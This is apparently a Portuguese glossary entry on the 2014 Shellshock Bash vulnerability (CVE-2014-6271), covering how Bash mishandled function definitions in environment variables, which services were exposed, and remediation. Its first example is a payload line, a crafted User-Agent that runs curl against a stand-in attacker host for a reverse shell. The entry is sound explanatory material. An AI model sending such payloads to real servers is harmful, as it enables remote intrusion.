Shellshock (CVE-2014-6271)
O que é Shellshock (CVE-2014-6271)?
Shellshock (CVE-2014-6271)Vulnerabilidade de 2014 no GNU Bash que permitia executar comandos arbitrários ao definir variáveis de ambiente especialmente construídas e passá-las ao Bash por outros programas.
O Shellshock (CVE-2014-6271 e o relacionado CVE-2014-7169) está na forma como o GNU Bash analisava definições de função armazenadas em variáveis de ambiente: comandos após o corpo da função eram executados ao iniciar a shell. Como muitos serviços — scripts CGI, clientes DHCP, OpenSSH ForceCommand, qmail — invocavam Bash com variáveis controladas pelo atacante, a exploração remota era trivial, muitas vezes como root. A divulgação em 2014 desencadeou patching global e exploração massiva para botnets, webshells e worms. A correção exige atualizar o Bash, substituir arquiteturas Bash-CGI antigas e aplicar defesa em profundidade com queda de privilégios e restrição da passagem de variáveis.
● Exemplos
- 01
Enviar User-Agent () { :; }; /bin/curl attacker.com a um endpoint Bash-CGI para obter shell reversa.
- 02
Explorar um cliente DHCP que exporta strings de opção para o ambiente de um script hook em Bash.
● Perguntas frequentes
O que é Shellshock (CVE-2014-6271)?
Vulnerabilidade de 2014 no GNU Bash que permitia executar comandos arbitrários ao definir variáveis de ambiente especialmente construídas e passá-las ao Bash por outros programas. Pertence à categoria Vulnerabilidades da cibersegurança.
O que significa Shellshock (CVE-2014-6271)?
Vulnerabilidade de 2014 no GNU Bash que permitia executar comandos arbitrários ao definir variáveis de ambiente especialmente construídas e passá-las ao Bash por outros programas.
Como se defender contra Shellshock (CVE-2014-6271)?
As defesas contra Shellshock (CVE-2014-6271) costumam combinar controles técnicos e práticas operacionais, conforme detalhado na definição acima.
Quais são outros nomes para Shellshock (CVE-2014-6271)?
Nomes alternativos comuns: Bashdoor, CVE-2014-6271.